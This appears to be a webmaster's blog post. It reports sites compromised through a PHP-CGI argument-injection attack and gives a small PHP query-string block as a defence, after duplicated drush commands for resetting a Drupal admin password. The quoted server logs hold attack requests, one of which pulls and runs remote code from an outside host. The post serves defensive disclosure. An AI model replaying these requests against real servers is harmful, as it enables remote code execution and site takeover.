SSH into the website document root and install drush:
1 |
composer require drush/drush |
Use drush to reset admin user password:
1 |
./vendor/bin/drush user-password admin --password=[newpass] |
SSH into the website document root and install drush:
1 |
composer require drush/drush |
Use drush to reset admin user password:
1 |
./vendor/bin/drush user-password admin --password=[newpass] |
We’ve seen several sites compromised in the last few weeks using a “local file inclusion” vulnerability with “php://input”. Here are some sample log entries:
91.224.160.25 - - [23/May/2013:12:23:54 +0000] "POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 247 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.860.0 Safari/535.2"
89.111.24.97 - - [29/May/2013:08:38:22 +0000] "GET /?-n+-dallow_url_include%3DOn+-dauto_prepend_file%3Dhttp://gofastdownload.com/rf/code.txt HTTP/1.1" 200 1104 "-" "Opera/9.80 (Windows NT 6.1; U; MRA 8.0 (build 5745); ru) Presto/2.10.229 Version/11.64"
This page explains the attack:
http://zerofreak.blogspot.com/2012/04/lfi-exploitation-via-phpinput-shelling.html
One of the compromised sites was Expression Engine and one was Drupal.
Here’s a bit of PHP code that I added to index.php to stop further attacks:
1 2 3 |
if (stripos($_SERVER['QUERY_STRING'],'php://input') !== FALSE) { die("Not allowed."); } |
Obviously this is a very serious threat. We would advise all sites to test for this vulnerability.